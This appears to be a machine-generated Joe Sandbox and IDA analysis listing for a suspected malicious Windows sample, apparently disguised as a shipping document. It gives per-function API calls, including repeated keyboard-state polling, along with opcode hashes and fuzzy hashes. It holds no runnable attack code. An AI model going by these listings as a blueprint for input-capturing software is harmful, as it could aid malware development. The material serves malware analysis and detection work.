                                                                                                                              • Instruction Fuzzy Hash: C821AB75940A04FFEB11DFF0ED89F663769EB88345F045128F50681171EB714DC69661
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B9997: __itow.LIBCMT ref: 009B99C2
                                                                                                                                • Part of subcall function 009B9997: __swprintf.LIBCMT ref: 009B9A0C
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00A1D676
                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A1D709
                                                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00A1D71D
                                                                                                                              • CoCreateInstance.OLE32(00A42D7C,00000000,00000001,00A68C1C,?), ref: 00A1D769
                                                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A1D7D8
                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 00A1D830
                                                                                                                              • _memset.LIBCMT ref: 00A1D86D
                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00A1D8A9
                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A1D8CC
                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00A1D8D3
                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00A1D90A
                                                                                                                              • CoUninitialize.OLE32 ref: 00A1D90C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1246142700-0
                                                                                                                              • Opcode ID: a7a628dd6a6bd304694a730a9fcd17109d0cd65b9ff487d5b9e22b512def0c07
                                                                                                                              • Instruction ID: 0a5187580b169c0b33a617edd10bceeeec256218426c39a063d7619f1b28ad4b
                                                                                                                              • Opcode Fuzzy Hash: a7a628dd6a6bd304694a730a9fcd17109d0cd65b9ff487d5b9e22b512def0c07
                                                                                                                              • Instruction Fuzzy Hash: B5B1ED75A10109AFDB14DFA4CD88EAEBBB9FF88314B148469F509EB261DB30ED45CB50
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?), ref: 00A103C8
                                                                                                                              • SetKeyboardState.USER32(?), ref: 00A10433
                                                                                                                              • GetAsyncKeyState.USER32 ref: 00A10453
                                                                                                                              • GetKeyState.USER32(000000A0), ref: 00A1046A
                                                                                                                              • GetAsyncKeyState.USER32 ref: 00A10499
                                                                                                                              • GetKeyState.USER32(000000A1), ref: 00A104AA
                                                                                                                              • GetAsyncKeyState.USER32 ref: 00A104D6
                                                                                                                              • GetKeyState.USER32(00000011), ref: 00A104E4
                                                                                                                              • GetAsyncKeyState.USER32 ref: 00A1050D
                                                                                                                              • GetKeyState.USER32(00000012), ref: 00A1051B
                                                                                                                              • GetAsyncKeyState.USER32 ref: 00A10544
                                                                                                                              • GetKeyState.USER32(0000005B), ref: 00A10552
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 541375521-0
                                                                                                                              • Opcode ID: fa6af995cd2c849ca22f7a56594a1945183f27df48f00fc2de2bfffcdfb66647
                                                                                                                              • Instruction ID: 6aa7b337c1e2b823012f9e59d222cf476ab0b56aaa17bc776d3a1f12b9a89aef
                                                                                                                              • Opcode Fuzzy Hash: fa6af995cd2c849ca22f7a56594a1945183f27df48f00fc2de2bfffcdfb66647
                                                                                                                              • Instruction Fuzzy Hash: 3451B92490878469FB35DBB08951FEEBFB59F01380F48859A95C25A1C3DAE49BCCCB61
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00A0C545
                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A0C557
                                                                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00A0C5B5
                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00A0C5C0
                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A0C5D2
                                                                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00A0C626
                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00A0C634
                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A0C645
                                                                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00A0C688
                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00A0C696
                                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A0C6B3
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A0C6C0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3096461208-0
                                                                                                                              • Opcode ID: 6dc504709f643d9baaa34341bf965725999a0b82e9c23753b407b122f6157262
                                                                                                                              • Instruction ID: 790fb179590bdec68e9a97add77efc17c85d2fcffba1f22d9c7c3e62138a5433
                                                                                                                              • Opcode Fuzzy Hash: 6dc504709f643d9baaa34341bf965725999a0b82e9c23753b407b122f6157262
                                                                                                                              • Instruction Fuzzy Hash: 1E513271F10209AFDB18CFA9DD85A6EBBB5EB88310F14822DF515D72E0D770AD018B50
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B1B41: InvalidateRect.USER32(?,00000000,00000001), ref: 009B1B9A
                                                                                                                              • DestroyWindow.USER32 ref: 009B20D3
                                                                                                                              • KillTimer.USER32 ref: 009B216E
                                                                                                                              • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,009B16CB,00000000,?,?,009B1AE2,?,?), ref: 009EBE26
                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009B16CB,00000000,?,?,009B1AE2,?,?), ref: 009EBE57
                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009B16CB,00000000,?,?,009B1AE2,?,?), ref: 009EBE6E
                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009B16CB,00000000,?,?,009B1AE2,?,?), ref: 009EBE8A
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 009EBE9C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 641708696-0
                                                                                                                              • Opcode ID: 2504cd05face57c4e3d71e5d8b77f7d7bbbedb753d6107eaf9e12843a2744eb2
                                                                                                                              • Instruction ID: 695f971174cf6881f6a90339554d8150eb3f29fdfa81a55cce5d5f988ad781de
                                                                                                                              • Opcode Fuzzy Hash: 2504cd05face57c4e3d71e5d8b77f7d7bbbedb753d6107eaf9e12843a2744eb2
                                                                                                                              • Instruction Fuzzy Hash: 21619F31914A50DFCB26EF69DE48BAA77F5FB40322F50882DE54656970C3B4AC82DF81
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B25DB: GetWindowLongW.USER32(?,000000EB), ref: 009B25EC
                                                                                                                              • GetSysColor.USER32(0000000F,?,?,?,?), ref: 009B21D3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ColorLongWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 259745315-0
                                                                                                                              • Opcode ID: 3ec83ffab3e56cdb6f8278f5efd15778ad6ea07cade3e858a9344ccc291e4fc1
                                                                                                                              • Instruction ID: f38a61effb257379863333c68f6692a7c31b7b3ef24e07444f60dfe539360599
                                                                                                                              • Opcode Fuzzy Hash: 3ec83ffab3e56cdb6f8278f5efd15778ad6ea07cade3e858a9344ccc291e4fc1
                                                                                                                              • Instruction Fuzzy Hash: 47418C31400144EFDB299FA8ED89BB93B69EB06731F184365FEA5CA1E5C7318C42DB21
                                                                                                                              APIs
                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00A1A995
                                                                                                                              • GetDriveTypeW.KERNEL32(00000061,00A689A0,00000061), ref: 00A1AA5F
                                                                                                                              • _wcscpy.LIBCMT ref: 00A1AA89
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                              • API String ID: 2820617543-1000479233
                                                                                                                              • Opcode ID: 0843d5aef5bfc110c9c29e7bddd7ac36deb95079d3f6e35b06c3b5f932785822
                                                                                                                              • Instruction ID: 6a32ab0fdf3b31695e5d75a45af7d076148a9915aa28fd57650788a47766f929
                                                                                                                              • Opcode Fuzzy Hash: 0843d5aef5bfc110c9c29e7bddd7ac36deb95079d3f6e35b06c3b5f932785822
                                                                                                                              • Instruction Fuzzy Hash: E051AC311283019FC710EF14CA92BEEB7A9EFE0350F54492DF596572A2DB319D89CA93
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __i64tow__itow__swprintf
                                                                                                                              • String ID: %.15g$0x%p$False$True
                                                                                                                              • API String ID: 421087845-2263619337
                                                                                                                              • Opcode ID: 0692a7274e62ee9d3f9b292361d9b29568c10782067e3405c37760a82418eacf
                                                                                                                              • Instruction ID: e6be0997e23db236f1c087a191e07564033202502d5212776997caaf4fdacea0
                                                                                                                              • Opcode Fuzzy Hash: 0692a7274e62ee9d3f9b292361d9b29568c10782067e3405c37760a82418eacf
                                                                                                                              • Instruction Fuzzy Hash: 2141D431514205AEDB249F79D942BBA77F8EF84310F20886FE54AD7292EA359D41C711
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                              • String ID: 0$F
                                                                                                                              • API String ID: 176399719-3044882817
                                                                                                                              • Opcode ID: 6d8a44a8c77a1dba331742731fdf375c10c790788e78751898d5b37e97cab4f4
                                                                                                                              • Instruction ID: 23d7d6c802eb14299c46cc518bddd2cff61887f9f9321193929a1fd612ceeaca
                                                                                                                              • Opcode Fuzzy Hash: 6d8a44a8c77a1dba331742731fdf375c10c790788e78751898d5b37e97cab4f4
                                                                                                                              • Instruction Fuzzy Hash: FB4133B5A01209EFDB20DFA4DC84AEABBB5FF49310F144129FD49A7360D770A910DBA0
                                                                                                                              APIs
                                                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000), ref: 00A37590
                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00A37597
                                                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A375AA
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00A375B2
                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A375BD
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00A375C6
                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00A375D0
                                                                                                                              • SetLayeredWindowAttributes.USER32 ref: 00A375E4
                                                                                                                              • DestroyWindow.USER32 ref: 00A375F0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                              • String ID: static
                                                                                                                              • API String ID: 2559357485-2160076837
                                                                                                                              • Opcode ID: 5a480c42817b6af7ec61c840782ad78322b3489787f4d0a1031e302dee4ff3dd
                                                                                                                              • Instruction ID: 26f71d4b28d42d16eaa2e341ae41abc45142948021d4bede17832ffc69ff0ef8
                                                                                                                              • Opcode Fuzzy Hash: 5a480c42817b6af7ec61c840782ad78322b3489787f4d0a1031e302dee4ff3dd
                                                                                                                              • Instruction Fuzzy Hash: 25318B72514219BFDF269FA4DC09FEA3B69FF09320F110225FA15A60A0C731E821DBA0
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 009D6FBB
                                                                                                                                • Part of subcall function 009D8CA8: __getptd_noexit.LIBCMT ref: 009D8CA8
                                                                                                                              • __gmtime64_s.LIBCMT ref: 009D7054
                                                                                                                              • __gmtime64_s.LIBCMT ref: 009D708A
                                                                                                                              • __gmtime64_s.LIBCMT ref: 009D70A7
                                                                                                                              • __allrem.LIBCMT ref: 009D70FD
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D7119
                                                                                                                              • __allrem.LIBCMT ref: 009D7130
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D714E
                                                                                                                              • __allrem.LIBCMT ref: 009D7165
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D7183
                                                                                                                              • __invoke_watson.LIBCMT ref: 009D71F4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 384356119-0
                                                                                                                              • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                              • Instruction ID: 39cf3baf7b558f36c1b7768078af01818d7cf3e073b9fabcab65ec2095795db2
                                                                                                                              • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                              • Instruction Fuzzy Hash: 3B71B571A84B16ABE7159F6DCC42B6AB3A8AF55324F14C22BF414E7381FB74DD408790
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00A1283A
                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00A1289B
                                                                                                                              • SetMenuItemInfoW.USER32 ref: 00A128D1
                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00A128E3
                                                                                                                              • GetMenuItemCount.USER32(?), ref: 00A12927
                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00A12943
                                                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00A1296D
                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 00A129B2
                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A129F8
                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00A12A0C
                                                                                                                              • SetMenuItemInfoW.USER32 ref: 00A12A2D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4176008265-0
                                                                                                                              • Opcode ID: 61ca8a1b26fc726bc63cc7c10b6687c093a5b5e9b408bd4c529e549a1a649787
                                                                                                                              • Instruction ID: daf3779c15ca359f761e9340ac49ca1928b6eb368133680912b97447542217c1
                                                                                                                              • Opcode Fuzzy Hash: 61ca8a1b26fc726bc63cc7c10b6687c093a5b5e9b408bd4c529e549a1a649787
                                                                                                                              • Instruction Fuzzy Hash: F0619E70900249AFDB21CFA8DD88BEE7BB9EF44344F140059F842A3251D731EDA6DB60
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A36FD7
                                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A36FDA
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A36FFE
                                                                                                                              • _memset.LIBCMT ref: 00A3700F
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A37021
                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A37099
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$LongWindow_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 830647256-0
                                                                                                                              • Opcode ID: a0f0aa617d22c6dbf6bbd6b76f2d94324a841351b2f82bdabf8e4a49e5ecacda
                                                                                                                              • Instruction ID: 91cf96829e42f5627da644cc6f38c785ed959c7b52d810147c7c0d081f2b8e91
                                                                                                                              • Opcode Fuzzy Hash: a0f0aa617d22c6dbf6bbd6b76f2d94324a841351b2f82bdabf8e4a49e5ecacda
                                                                                                                              • Instruction Fuzzy Hash: FB618E75900248AFDB21DFA4CD81EEE77F8EF09710F14415AFA15AB2A1C770AD42DB60
                                                                                                                              APIs
                                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A06F15
                                                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00A06F6E
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00A06F80
                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A06FA0
                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00A06FF3
                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?,00000002,?,?,?,?,?,?,?,00A06CA6), ref: 00A07007
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00A0701C
                                                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00A07029
                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A07032
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00A07044
                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A0704F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2706829360-0
                                                                                                                              • Opcode ID: 935f578b1a2752d68b147e3c0b395cce642a1a8eef6df001c928dc6e4a468cac
                                                                                                                              • Instruction ID: 77cd691d0751f25a7f13adb17384fbcbcd106f7378c3c35d412187ea6ed09720
                                                                                                                              • Opcode Fuzzy Hash: 935f578b1a2752d68b147e3c0b395cce642a1a8eef6df001c928dc6e4a468cac
                                                                                                                              • Instruction Fuzzy Hash: 21413035D1021DAFCB00DFA8ED489AEBBB9EF48314F008069F955A7261CB31A956CB90
                                                                                                                              APIs
